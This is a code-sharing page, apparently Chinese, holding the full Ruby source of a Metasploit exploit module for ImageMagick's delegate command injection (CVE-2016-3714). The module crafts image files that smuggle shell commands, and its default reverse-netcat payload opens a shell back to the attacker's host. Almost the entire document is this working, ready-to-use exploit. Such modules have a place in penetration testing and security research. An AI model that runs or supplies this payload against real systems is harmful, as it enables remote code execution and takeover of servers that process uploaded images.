扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name'=> 'ImageMagick Delegate Arbitrary Command Execution', 'Description' => %q{ This module exploits a shell command injection in the way "delegates" (commands for converting files) are processed in ImageMagick versions <= 7.0.1-0 and <= 6.9.3-9 (legacy). Since ImageMagick uses file magic to detect file format, you can create a .png (for example) which is actually a crafted SVG (for example) that triggers the command injection. Tested on Linux, BSD, and OS X. You'll want to choose your payload carefully due to portability concerns. Use cmd/unix/generic if need be. }, 'Author'=> [ 'stewie',# Vulnerability discovery 'Nikolay Ermishkin', # Vulnerability discovery 'wvu', # Metasploit module 'hdm'# Metasploit module ], 'References'=> [ %w{CVE 2016-3714}, %w{URL https://imagetragick.com/}, %w{URL http://seclists.org/oss-sec/2016/q2/205}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456} ], 'DisclosureDate'=> 'May 3 2016', 'License' => MSF_LICENSE, 'Platform'=> 'unix', 'Arch'=> ARCH_CMD, 'Privileged'=> false, 'Payload' => { 'BadChars'=> "\x22\x27\x5c", # ", ', and \ 'Compat'=> { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic netcat bash-tcp' } }, 'Targets' => [ ['SVG file',template: 'msf.svg'], # convert msf.png msf.svg ['MVG file',template: 'msf.mvg'], # convert msf.svg msf.mvg ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff ], 'DefaultTarget' => 0, 'DefaultOptions'=> { 'PAYLOAD' => 'cmd/unix/reverse_netcat', 'LHOST' => Rex::Socket.source_address, 'DisablePayloadHandler' => false, 'WfsDelay'=> 9001 } )) register_options([ OptString.new('FILENAME', [true, 'Output file', 'msf.png']) ]) end def exploit if target.name == 'SVG file' p = Rex::Text.html_encode(payload.encoded) else p = payload.encoded end file_create(template.sub('echo vulnerable', p)) end def template File.read(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template] )) end end |
体验盒子
